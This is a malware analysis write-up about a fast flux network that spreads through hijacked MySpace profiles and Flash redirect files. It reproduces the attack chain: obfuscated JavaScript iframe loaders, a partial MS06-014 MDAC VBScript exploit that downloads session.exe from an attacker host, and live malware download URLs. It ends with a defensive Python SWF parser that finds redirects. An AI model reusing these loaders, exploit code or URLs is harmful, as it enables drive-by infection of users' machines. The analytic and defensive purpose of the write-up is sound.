Two primary infection vectors have been observed, providing us with unique insight into the life cycle involved in propagating a fast flux service network. The attack vectors are:
- Compromised MySpace Member profiles redirecting to phishing sites (this has been discussed here)
- SWF Flash image malicious redirection to Phishing and drive-by browser exploit attempt.
All Flash redirects were observed redirecting browsers to http://www.e44 7aa2.com (****CAREFUL****)
( e447aa2.com is a domain currently serviced by this flux network with wildcard DNS resolution )
$ GET http://www.e44 7aa2.com
<HTML> <HEAD> <meta http-equiv="refresh" content="1;url=http://login.my space.cfm.fuseaction.splash.myto ken.76701a26.da3e.44a3a17b.e44 7aa2.com/da3e/index.php" /> </HEAD> </HTML>
(The above URL is only a single example of potentially infinite permutations.)
Following the above /da3e/index.php link results in a credible-looking MySpace landing page (served in flux) with the most interesting footer element displayed below:
<!-- onRequestEnd -->
<script>window.status="Done"</script><iframe src="../.footer_01.gif" width=0 height=0></iframe>
The IFrame renders /.footer_01.gif, which is not an actual GIF but an encoded/obfuscated JavaScript snippet:
<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>
The decoded result of the above /.footer_01.gif is:
<script>window.status="Done"</script>
<iframe src="http://fafb 4c4c.com/header_03.gif" width=1 height=1></iframe>
The IFrame renders /header_03.gif (served in flux), which is another encoded/obfuscated JavaScript file:
<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74
REMOVED
?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%
REMOVED
dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>
The decoded result of the above /header_03.gif is:
<script>window.status="Done"</script>
<iframe src="http://fafb 4c4c.com/routine.php" width=1 height=1></iframe>
Following the IFrame to /routine.php yields yet another encoded/obfuscated JavaScript file:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Routine Session ID: ca0910cWc01bT69aeA7e3030d1f52a45</title>
<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E
REMOVED
\"lpwvgp%08y\"+*pmppGgnflcj\"lmkvalwd%08< vrkpaqctch-vzgv?gr{v\"vrkpaq>"));
</SCRIPT>
<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E
REMOVED
-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
</head>
<body onload="doesnotexist()">
<SCRIPT Language="JavaScript">
eval(unescape("
REMOVED
"));
</SCRIPT>
</body>
</html>
The decoded result of /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014), for which Microsoft released a patch in May 2006.
<script type="text/javascript">
function handleError() {
return true;
}
window.onerror = handleError;
</script>
<script>window.status="Done"</script>
<SCRIPT language="VBScript">
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0 Then
REMOVED
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "GET","http://fafb 4c4c.com/session.exe",False
obj_msxml2.send
REMOVED
End If
</SCRIPT>
The successful compromise of a Windows host via this exploit content results in the download of a malicious downloader stub executable (session.exe), which is then responsible for attempting to download the additional malicious components needed to integrate the newly compromised host into a fast flux service network.
The malware stub (session.exe) above attempts to download and execute the following components:
http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
http://fcs.camgenie .com/weby7.exe
Now back to these Evil Flash File Redirects:
What follows is a representative sampling of URLs for Flash files hosted on the imageshack.us site which perform one simple action: an ActionScript-based browser redirect to a fast flux service network hosted combination phishing and drive-by exploit page that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014).
All files are identical, sharing the same MD5 and SHA1 hashes:
MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740
The Imageshack HTTP server's maintained mtime suggests a deployment time of 2007-06-05 03:56:30-0700.
Decompiling a flash component results in the discovery of that terrible redirect:
$ swfdump -atp ./img527.imageshack.us/img527/3530/38023350se6.swf
[HEADER] File version: 8
[HEADER] File size: 98
[HEADER] Frame rate: 120.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 1.00
[HEADER] Movie height: 1.00
[045] 4 FILEATTRIBUTES
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018] 31 PROTECT
[00c] 28 DOACTION
( 24 bytes) action: GetUrl URL:"http://www.e447 aa2.com" Label:""
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END
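Added example, not from the original write-up: a small Python SWF tag walker that does what swfdump -a did above, pulling GetURL targets out of DOACTION tags so a batch of hosted Flash files can be screened for redirects before they ever reach a browser. The SWF bytes are constructed inline with a placeholder URL (not the imageshack sample), and zlib-compressed CWS files are handled as well.

```python
import struct
import zlib

# Constructed minimal SWF (not the page's sample): 1x1 px, one frame, one DOACTION tag with a single GetURL.
REDIRECT = b"http://www.example.invalid/landing"          # placeholder redirect target
_doaction = b"\x83" + struct.pack("<H", len(REDIRECT) + 2) + REDIRECT + b"\x00\x00\x00"  # GetURL: url NUL, target NUL; then ActionEnd
_body = (
    b"\x30\x0a\x00\xa0" + struct.pack("<HH", 120 << 8, 1)        # RECT (nbits=6, 0..20 twips), rate 120.0 (8.8 fixed), 1 frame
    + struct.pack("<H", (69 << 6) | 4) + b"\x00" * 4             # FILEATTRIBUTES
    + struct.pack("<H", (9 << 6) | 3) + b"\xff\xff\xff"          # SETBACKGROUNDCOLOR (ff/ff/ff)
    + struct.pack("<H", (12 << 6) | len(_doaction)) + _doaction  # DOACTION
    + struct.pack("<HH", 1 << 6, 0)                              # SHOWFRAME, END
)
SAMPLE_SWF = b"FWS\x08" + struct.pack("<I", 8 + len(_body)) + _body
SAMPLE_SWF_CWS = b"CWS" + SAMPLE_SWF[3:8] + zlib.compress(_body)  # same movie, compressed body

def swf_tags(data):
    """Yield (code, payload) for each tag of an uncompressed FWS or zlib-compressed CWS file."""
    body = data[8:]
    if data[:3] == b"CWS":
        body = zlib.decompress(body)
    elif data[:3] != b"FWS":
        raise ValueError("not a SWF file")
    nbits = body[0] >> 3                        # RECT opens with a 5-bit field width
    pos = (5 + 4 * nbits + 7) // 8 + 4          # skip RECT, frame rate and frame count
    while pos + 2 <= len(body):
        code_len = struct.unpack_from("<H", body, pos)[0]
        code, length, pos = code_len >> 6, code_len & 0x3F, pos + 2
        if length == 0x3F:                      # long form: true length follows as u32
            length, pos = struct.unpack_from("<I", body, pos)[0], pos + 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:                           # END tag
            return

def geturl_targets(data):
    """Return (url, target) for every GetURL (0x83) action found in DOACTION (12) tags."""
    found = []
    for code, payload in swf_tags(data):
        pos = 0
        while code == 12 and pos < len(payload) and payload[pos] != 0:   # 0 = ActionEnd
            action, pos = payload[pos], pos + 1
            if action < 0x80:                   # short actions carry no payload
                continue
            length, pos = struct.unpack_from("<H", payload, pos)[0], pos + 2
            if action == 0x83:
                url, _, rest = payload[pos:pos + length].partition(b"\x00")
                found.append((url.decode("latin-1"), rest.split(b"\x00")[0].decode("latin-1")))
            pos += length
    return found
```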
Where in the world are Flash files like the above being hosted?
This write-up is not intended to address the more complex overview of what a fast flux service network is (that is forthcoming). Essentially, all URLs involved in this fast flux service network are served by compromised hosts that redirect their HTTP and DNS traffic to another upstream Mothership host.